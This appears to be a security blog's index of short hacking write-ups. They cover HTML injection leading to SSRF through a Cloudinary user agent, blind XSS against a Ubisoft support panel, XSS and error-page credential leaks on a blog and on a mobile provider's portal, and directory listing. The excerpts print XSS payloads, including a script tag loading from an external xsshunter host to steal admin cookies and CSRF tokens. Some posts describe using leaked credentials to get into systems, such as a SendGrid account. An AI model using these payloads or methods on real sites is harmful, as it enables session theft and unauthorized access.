Posts

HTML injection to SSRF

Image
Hey Guys! 
Last night I had posted about HTML injection to SSRF and some of fellow researchers disagreed to my post that either its from your localhost or its a client based request forgery means my browser is responsible for the response. you can see the below Screenshot that was my question and the poc of getting the response from the cloud server of the program. So this was my question and I provided the screenshot as a poc but again some of fellow researchers said its coming from either your localhost or browser side. But to let you know its not coming from my browser and the program is using Cloudinary service as you can notice from the user agent its Cloudinary 1.0. So the whole scenario was like when I was putting <img src=”http://myip:port”> in the text editor and there are four options. 1: help 2: markdown 3: Preview 4: save post so before clicking on one of these we need to start netcat to listen on the given port in order to get a back response. in terminal write: nc …

UBISOFT | BLIND XSS TO CUSTOMER SUPPORT PANEL TAKEOVER

Image
hey folks! hope y'all great , i recently found a XSS in support.ubisoft.com which lead  the attacker to takeover customer support panel :
Vulnerability : Cross Site Scripting Identifying Vulnerability : While i was facing a problem in Wd2 I goto know about http://support.ubi.com , I opened a ticket for that ,and i got the idea of why not test it out for xss  i send the following payload  :
<script>alert("XSS POC BY HX01");</script> and boom!


Exploitation : since the webapp was vulnerable to xss i added an payload from xsshunter.com  to steal the Admin Cookies,CSRF token etc :
"><script src=https://usociety.xss.ht></script> now time to make the victim visit the url:


since some of the admin cookies were httponly i wasn't able to login into it but however due to xsshunter i was able to get the Ip,CSRF token(which could have lead to compromise agent)& some tickets information,some players id due to another xss trigger :
Reported the …

MANGOBAAZ HACKED | XSS TO CREDENTIALS EXPOSURE TO PWN

Image
Vulnerabilities identified : XSS , IMPROPER ERROR HANDLING
hey folks! hope y'all are fine, i recently got access to a paki blog @mangobaazand here is the writeup how i was able to hack into.
INFORMATION GATHERING : while information gathering i came across to a website "hungerist.com" which was owned by mangobaaz and the signup page captured my antention so i selected it to peneterate.


IDENTIFYING VULNERABILITY : i added  the xss payload in the NAME Field : <script>alert("XSS BY HX01);</script> and BOOM! XSSED :

since i was trying to steal  cookies  i tried another payload  :

<iframe src=" jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e "></iframe> an xss didn't triggered but an error did:
since it was improper error handling it leaked some credentials :D including…

Directory Listing To Sensitive Files Exposure

Image
Vulnerability : Directory Listing   since the website is priva8  and couldn't be disclose lets name it Redacted.com While surfing across a website i came to know that website was vulnerable to Directory Listing . since the website was using Wordpress as the cms i knew i couldn't find something else as it was already uptodate and didnt found anything interesting at : Redacted.com/wp-content/uploads/ , i decided to enumerate the directories manually since i didn't had access to dirbuster at that time. i found out some dirs like Redacted.com/images,Redacted.com/assets, and the fishy one "Redacted.com/uploads ". the Redacted.com/uploads included alot of images and three dirs "stores,shipments,voucher :
 nothing saucy was found in "Redacted.com/uploads/stores" therefore i opened voucher and BOOM!  there were some backup files (not sure of it but were sensitive & left  public ) i.e *idh anyother screenshots as it was not ethical to* :
 and hence this…

Recon To Admin Creditionals Disclosure

Image
Vulnerability : Information Leakage due to improper error handling
It all started with a cup of tea and curiosity to hack into my Mobile network Provider . I ussually start my recon with the firing google dorks and Sniper . since the name of that company can't be disclose lets substitute it as xyz.com .

Firing this dork inurl: xyz i was able to get my target that web looklikes a VPBX portal for the marketing businesses  and call centers :

I tried Dirbuster but was not able to find anything and there were only default http & https ports were opened. since nothing else was left i tried giving a try to Request A Free Demo with fake details to avoid spam and BOOM! this error showed up : 
and this error leaked some creditionals  : 

TIME TO EXPLOIT : Since the DB was accessible through internal ip i wasn't able to exploit it however i got access to companies Sengrid Account which was enough :

Best Regards, @Hx01